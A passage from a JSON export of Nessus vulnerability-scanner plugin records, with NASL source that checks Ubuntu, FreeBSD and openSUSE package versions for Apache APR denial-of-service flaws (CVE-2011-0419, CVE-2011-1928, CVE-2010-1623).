exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(6\\.06|8\\.04|10\\.04|10\\.10|11\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 8.04 / 10.04 / 10.10 / 11.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libapr0\", pkgver:\"2.0.55-4ubuntu2.13\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libapr1\", pkgver:\"1.2.11-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libapr1\", pkgver:\"1.3.8-1ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libapr1\", pkgver:\"1.4.2-3ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"libapr1\", pkgver:\"1.4.2-7ubuntu2.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libapr0 / libapr1\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:03:59", "description": "The Apache Portable Runtime Project reports :\n\nA flaw was discovered in the apr_fnmatch() function in the Apache Portable Runtime (APR) library 1.4.4 (or any backported versions that contained the upstream fix for CVE-2011-0419). This could cause httpd workers to enter a hung state (100% CPU utilization).\n\napr-util 1.3.11 could cause crashes with httpd's mod_authnz_ldap in some situations.", "cvss3": {}, "published": "2011-05-24T00:00:00", "type": "nessus", "title": "FreeBSD : Apache APR -- DoS vulnerabilities (99a5590c-857e-11e0-96b7-00300582f9fc)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:apr1", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_99A5590C857E11E096B700300582F9FC.NASL", "href": "https://www.tenable.com/plugins/nessus/54623", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(54623);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-0419\", \"CVE-2011-1928\");\n script_bugtraq_id(47929);\n\n script_name(english:\"FreeBSD : Apache APR -- DoS vulnerabilities (99a5590c-857e-11e0-96b7-00300582f9fc)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Apache Portable Runtime Project reports :\n\nA flaw was discovered in the apr_fnmatch() function in the Apache\nPortable Runtime (APR) library 1.4.4 (or any backported versions that\ncontained the upstream fix for CVE-2011-0419). This could cause httpd\nworkers to enter a hung state (100% CPU utilization).\n\napr-util 1.3.11 could cause crashes with httpd's mod_authnz_ldap in\nsome situations.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.apache.org/dist/apr/Announcement1.x.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2011-1928\"\n );\n # https://vuxml.freebsd.org/freebsd/99a5590c-857e-11e0-96b7-00300582f9fc.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0296aa2a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apr1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"apr1<1.4.5.1.3.12\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:15:05", "description": "This update fixes :\n\n - CVE-2011-0419 and CVE-2011-1928: unconstrained recursion when processing patterns\n\n - CVE-2010-1623: a remote DoS (memory leak) in APR's reqtimeout_filter function", "cvss3": {}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : apache2 (openSUSE-SU-2011:0859-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1623", "CVE-2011-0419", "CVE-2011-1928"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2", "p-cpe:/a:novell:opensuse:apache2-devel", "p-cpe:/a:novell:opensuse:apache2-example-certificates", "p-cpe:/a:novell:opensuse:apache2-example-pages", "p-cpe:/a:novell:opensuse:apache2-itk", "p-cpe:/a:novell:opensuse:apache2-prefork", "p-cpe:/a:novell:opensuse:apache2-utils", "p-cpe:/a:novell:opensuse:apache2-worker", "p-cpe:/a:novell:opensuse:libapr-util1", "p-cpe:/a:novell:opensuse:libapr-util1-dbd-mysql", "p-cpe:/a:novell:opensuse:libapr-util1-dbd-pgsql", "p-cpe:/a:novell:opensuse:libapr-util1-dbd-sqlite3", "p-cpe:/a:novell:opensuse:libapr-util1-devel", "p-cpe:/a:novell:opensuse:libapr1", "p-cpe:/a:novell:opensuse:libapr1-devel", "cpe:/o:novell:opensuse:11.3"], "id": "SUSE_11_3_APACHE2-110726.NASL", "href": "https://www.tenable.com/plugins/nessus/75424", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update apache2-4926.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75424);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-1623\", \"CVE-2011-0419\", \"CVE-2011-1928\");\n\n script_name(english:\"openSUSE Security Update : apache2 (openSUSE-SU-2011:0859-1)\");\n script_summary(english:\"Check for the apache2-4926 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes :\n\n - CVE-2011-0419 and CVE-2011-1928: unconstrained recursion\n when processing patterns\n\n - CVE-2010-1623: a remote DoS (memory leak) in APR's\n reqtimeout_filter function\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=653510\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=670027\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=690734\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=693778\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2011-08/msg00001.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-certificates\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libapr-util1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libapr-util1-dbd-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libapr-util1-dbd-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libapr-util1-dbd-sqlite3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libapr-util1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libapr1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libapr1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/07/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-2.2.15-4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-devel-2.2.15-4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-example-certificates-2.2.15-4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-example-pages-2.2.15-4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-itk-2.2.15-4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-prefork-2.2.15-4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-utils-2.2.15-4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-worker-2.2.15-4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libapr-util1-1.3.9-7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libapr-util1-dbd-mysql-1.3.9-7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libapr-util1-dbd-pgsql-1.3.9-7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libapr-util1-dbd-sqlite3-1.3.9-7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libapr-util1-devel-1.3.9-7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libapr1-1.3.8-8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libapr1-devel-1.3.8-8.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libapr1\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:08", "description": "This update fixes :\n\n - CVE-2011-0419 and CVE-2011-1928: unconstrained recursion when processing patterns\n\n - CVE-2010-1623: a remote DoS (memory leak) in APR's reqtimeout_filter function", "cvss3": {}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : apache2 (openSUSE-SU-2011:0859-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1623", "CVE-2011-0419", "CVE-2011-1928"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2", "p-cpe:/a:novell:opensuse:apache2-debuginfo", "p-cpe:/a:novell:opensuse:apache2-debugsource", "p-cpe:/a:novell:opensuse:apache2-devel", "p-cpe:/a:novell:opensuse:apache2-example-certificates", "p-cpe:/a:novell:opensuse:apache2-example-pages", "p-cpe:/a:novell:opensuse:apache2-itk", "p-cpe:/a:novell:opensuse:apache2-itk-debuginfo", "p-cpe:/a:novell:opensuse:apache2-prefork", "p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo", "p-cpe:/a:novell:opensuse:apache2-utils", "p-cpe:/a:novell:opensuse:apache2-utils-debuginfo", "p-cpe:/a:novell:opensuse:apache2-worker", "p-cpe:/a:novell:opensuse:apache2-worker-debuginfo", "p-cpe:/a:novell:opensuse:libapr-util1", "p-cpe:/a:novell:opensuse:libapr-util1-dbd-mysql", "p-cpe:/a:novell:opensuse:libapr-util1-dbd-mysql-debuginfo", "p-cpe:/a:novell:opensuse:libapr-util1-dbd-pgsql", "p-cpe:/a:novell:opensuse:libapr-util1-dbd-pgsql-debuginfo", "p-cpe:/a:novell:opensuse:libapr-util1-dbd-sqlite3", "p-cpe:/a:novell:opensuse:libapr-util1-dbd-sqlite3-debuginfo", "p-cpe:/a:novell:opensuse:libapr-util1-debuginfo", "p-cpe:/a:novell:opensuse:libapr-util1-debugsource", "p-cpe:/a:novell:opensuse:libapr-util1-devel", "p-cpe:/a:novell:opensuse:libapr1", "p-cpe:/a:novell:opensuse:libapr1-debuginfo", "p-cpe:/a:novell:opensuse:libapr1-debugsource", "p-cpe:/a:novell:opensuse:libapr1-devel", "cpe:/o:novell:opensuse:11.4"], "id": "SUSE_11_4_APACHE2-110726.NASL", "href": "https://www.tenable.com/plugins/nessus/75785", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update apache2-4926.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75785);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-1623\", \"CVE-2011-0419\", \"CVE-2011-1928\");\n\n script_name(english:\"openSUSE Security Update : apache2 (openSUSE-SU-2011:0859-1)\");\n script_summary(english:\"Check for the apache2-4926 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes :\n\n - CVE-2011-0419 and CVE-2011-1928: unconstrained recursion\n when processing patterns\n\n - CVE-2010-1623: a remote DoS (memory leak) in APR's\n reqtimeout_filter function\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=653510\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=670027\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=690734\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=693778\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2011-08/msg00001.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-certificates\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libapr-util1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libapr-util1-dbd-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libapr-util1-dbd-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libapr-util1-dbd-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libapr-util1-dbd-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libapr-util1-dbd-sqlite3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libapr-util1-dbd-sqlite3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libapr-util1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libapr-util1-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libapr-util1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libapr1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libapr1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libapr1-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libapr1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/07/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-2.2.17-4.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-debuginfo-2.2.17-4.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-debugsource-2.2.17-4.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-devel-2.2.17-4.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-example-certificates-2.2.17-4.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-example-pages-2.2.17-4.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-itk-2.2.17-4.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-itk-debuginfo-2.2.17-4.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-prefork-2.2.17-4.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-prefork-debuginfo-2.2.17-4.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-utils-2.2.17-4.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-utils-debuginfo-2.2.17-4.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-worker-2.2.17-4.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-worker-debuginfo-2.2.17-4.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libapr-util1-1.3.9-10.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libapr-util1-dbd-mysql-1.3.9-10.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libapr-util1-dbd-mysql-debuginfo-1.3.9-10.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libapr-util1-dbd-pgsql-1.3.9-10.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libapr-util1-dbd-pgsql-debuginfo-1.3.9-10.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libapr-util1-dbd-sqlite3-1.3.9-10.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libapr-util1-dbd-sqlite3-debuginfo-1.3.9-10.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libapr-util1-debuginfo-1.3.9-10.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libapr-util1-debugsource-1.3.9-10.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libapr-util1-devel-1.3.9-10.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libapr1-1.4.2-4.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libapr1-debuginfo-1.4.2-4.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libapr1-debugsource-1.4.2-4.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libapr1-devel-1.4.2-4.5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libapr1\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:34", "description": "This update fixes the following security issues :\n\n - 650435: remote DoS in APR. (CVE-2010-1623)\n\n - 693778: unconstrained recursion when processing patterns (CVE-2011-0419 / CVE-2011-1928)", "cvss3": {}, "published": "2011-07-12T00:00:00", "type": "nessus", 